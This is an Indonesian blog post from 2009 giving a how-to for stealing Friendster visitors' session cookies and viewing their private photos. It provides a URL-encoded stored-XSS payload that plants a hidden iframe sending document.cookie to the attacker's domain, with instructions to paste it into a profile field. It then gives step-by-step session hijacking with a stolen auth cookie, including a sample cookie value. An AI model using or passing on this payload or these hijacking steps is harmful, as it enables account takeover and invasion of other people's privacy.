Senin, 10 Agustus 2009

Cara mudah Nyolong Password Friendster pengunjung via Cookies

Cara mudah Nyolong Password Friendster pengunjung via Cookies

Cara mudah nyolong cookie pengunjung Friendster

sebelum melangkah jauh apakah anda sudah tahu mengenai cookie ?.. apa itu cookie?..

Cookies merupakan data file yang ditulis ke dalam hard disk komputer oleh web server yang digunakan untuk mengidentifikasikan diri user pada situs tersebut sehingga sewaktu user kembali mengunjugi situs tersebut, situs itu akan dapat mengenalinya.

Fugsi cookies :

1. Membantu web site untuk “mengingat” siapa kita dan mengatur preferences yang sesuai sehingga apabila user kembali mengunjungi web site tersebut akan langsung dikenali.

2. Menghilangkan kebutuhan untuk me-register ulang di web site tersebut saat mengakses lagi tersebut (site tertentu saja), cookies membantu proses login user ke dalam web server tersebut.

3. Memungkinkan web site untuk menelusuri pola web surfing user dan mengetahui situs favorit yang sering dikunjunginya.

Jenis Cookies

1. Non persistent (session) cookies. Suatu cookie yang akan hilang sewaktu user menutup browser dan biasanya digunakan pada shopping carts‘ di toko belanja online untuk menelusuri item-item yang dibeli,

2. Persistent cookies. Diatur oleh situs-situs portal, banner / media iklan situs dan lainnya yang ingin tahu ketika user kembali mengunjungi site mereka. (misal dengan cara memberikan opsi ”Remember Me” saat login). File file ini tersimpan di hardisk user.

Kedua tipe cookies ini menyimpan informasi mengenai URL atau domain name dari situs yang dikunjungi user dan beberapa kode yang mengindikasikan halaman apa saja yang sudah dikunjungi. Cookies dapat berisi informasi pribadi user, seperti nama dan alamat email, Akan tetapi dapat juga user memberikan informasi ke website tersebut melalui proses registrasi. Dengan kata lain, cookies tidak akan dapat “mencuri” nama dan alamat email kecuali diberikan oleh user. Namun demikian, ada kode tertentu (malicious code) yang dibuat misalnya dengan ActiveX control, yang dapat mengambil informasi dari PC tanpa sepengetahuan user.

Cookies umumnya kurang dari 100 bytes sehingga tidak akan mempengaruhi kecepatan browsing. tetapi karena umumnya browser diatur secara default untuk menerima cookies maka user tidak akan tahu bahwa cookies sudah ada di komputer. Cookies dapat berguna terutama pada situs yang memerlukan registrasi, sehingga setiap kali mengunjungi situs tersebut, cookies akan me-login-kan user tanpa harus memasukkan user name dan password lagi.

kembali kepermasalahan

Cara mudah nyolong cookie pengunjung FS

Tanpa popup, tanpa redirect

1. Buat file php di hostingan kamu

cok.php

 

misal file php tersebut bisa diakses dengan alamat http://domainkamu.com/cok.php trus buat file kosong “cookie.txt”, ubah permission nya jadi 777

2. Ada kode html nih

document.write(’’);

silakan di ubah bentuk jadi URL ENCODE, bisa menggunakan tool http://fs.dibatam.com/?p=64

hasilnya

%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%68%65%69%67%68%74%3d%30%20%77%69%64%74%68%3d%30%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%6d%61%69%6e%6b%61%6d%75%2e%63%6f%6d%2f%63%6f%6b%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%2b%27%22%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b

3. Masukkan ke “Describe Who You Want to Meet: ” di fs kamu kode tadi

Saya mau apa sapa aja deh :) <=== silakan diubah2

antara gak usah dikasih spasi / enter

4. tinggal nunggu panen cookie

Mengintip private photo Friendster

naah ini nih yang ditunggu - tunggu cara ini belum efektif masih termasuk kategori ribet bin rubit hehehehe :D nanti kalau ada waktu dikembangin lagi biar maknyus :)

Memanfaatkan cookie hasil colongan untuk ngintip private photo FS

1. Dah dapet cookie target
2. Syarat, bisa liat ID Album dari target
3. Punya cookie editor : https://addons.mozilla.org/en-US/firefox/addon/573

Let’s do it.

1. Ambil cookie “friendster_profiles_auth”,

uid=82253580&lastclick=1226555951&timeout=1226642351&ip_country=ID&country=ID&mac=NTFmNTU1NjRmNTc4ZDU3ZWIwYTQ3MDBjNTE4OWMzZDA*

Ubah jadi url-encode biasa, bukan encode model nyolong yg sebelum nya,
Bisa pake tool => http://www.albionresearch.com/misc/urlencode.php
jadi :

uid%3D82253580%26lastclick%3D1226555951%26timeout%3D1226642351%26ip_country%3DID%26country%3DID%26mac%3DNTFmNTU1NjRmNTc4ZDU3ZWIwYTQ3MDBjNTE4OWMzZDA*

Ubah * di akhir itu dengan %2A
AMANKAN.

2. Cari id album private target.

http://www.friendster.com/viewalbums.php?uid=82253580
591960829 <== ini id album private nya, sekalian liat jumlah fotonya yah :)

3. http://fs.dibatam.com/ajax.php
Masukkan uid target + id album + jumlah foto
ntar nongol

http://www.friendster.com/image-server.php/08/53/82253580/private_1_67b8578e7f18d133298f9b06fb13e07056b22962f18eeafd65dd96add0c891f5l.jpg

Itu link foto nya.

4. Mainkan cookie editor kita, dengan bantuan searchnya, buang semua cookie yg berhubungan ama friendster
5. Buat cookie baru, contoh ada di gambar
6. Buka fotonya, klik aja hasil dari http://fs.dibatam.com/ajax.php tadi
7. Harusnya dah bisa keliatan tuh private photo nya.

SELAMAT MENCOBA
Ribet yah proses nya, hehehehhe. Ya gitu dehhh.

kalo ada yg dah bisa mengartikan kode acak2an nya link foto private itu jadi link bentuk angka normal. Itu baru mantep. hehehhe. Clue : kayaknya itu bukan hash model md5 tapi angka hexadecimal. Baru tebakan loh ya, saya juga masih nyoba2. Lom ketemu Clue labih lanjut

Sumber
Load disqus comments

0 komentar